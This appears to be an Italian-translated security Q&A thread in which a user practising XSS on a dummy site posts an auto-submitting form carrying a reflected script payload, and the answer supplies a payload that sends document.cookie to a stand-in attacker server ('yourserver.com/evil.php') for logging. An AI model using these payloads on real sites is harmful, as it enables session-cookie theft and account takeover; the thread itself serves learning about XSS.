XSS mostra cookie di un altro sito web

Naviga le tue risposte
-1

Cercando di praticare XSS sul sito Web fittizio. Il mio obiettivo finale è quello di visualizzare i cookie della vittima sul mio sito "attaccante". Attualmente quello che ho è che quando l'utente entra nel mio sito, verrà visualizzato il sito Web fittizio e avviserà i cookie tramite javascript alle vittime. C'è un modo per fare in modo che l'avviso venga visualizzato sul mio sito utente malintenzionato? 

<!DOCTYPE html>
<head></head>
<body>
    <form name ='xss_form' action='http://dummy_site.com/search' method="GET">
        <input type='hidden' name='query' value='<script>alert(document.cookie)</script>'>
    </form>

    <iframe name="hiddenFrame" style='display:none'></iframe>

    <script>
        document.xss_form.submit();
    </script>


</body>

L'iframe è impostato in modo tale che, se esiste un modo per visualizzare la casella di avviso sul mio sito degli utenti malintenzionati, posso semplicemente impostare la destinazione del modulo sull'iframe e impedire il popup di dummy_site.

    
posta user3277633 23.11.2015 - 00:19
fonte

1 risposta

3

Quello che stai cercando di fare è impossibile (con quel metodo). Innanzitutto, il modulo viene inviato a un sito Web diverso, in modo tale da reindirizzare il browser dal tuo sito. Inoltre, JavaScript verrà eseguito sull'altro sito e non è possibile utilizzarlo per accedere ai cookie da un dominio diverso.

La soluzione sarebbe quella di configurare un semplice server che registra i valori inviati ad esso. Iniettare alcuni XSS nel sito Web della vittima come: <script>document.write('<img src="http://yourserver.com/evil.php?cookie='+document.cookie+'"/>')</script> e richiedere al server di registrare il valore dal parametro GET del cookie.

    
risposta data 23.11.2015 - 00:46
fonte

Leggi altre domande sui tag

Lo spammer utilizza il dominio straniero per il reindirizzamento [duplicato] Griefing nei circoli sociali degli esperti di sicurezza? [chiuso]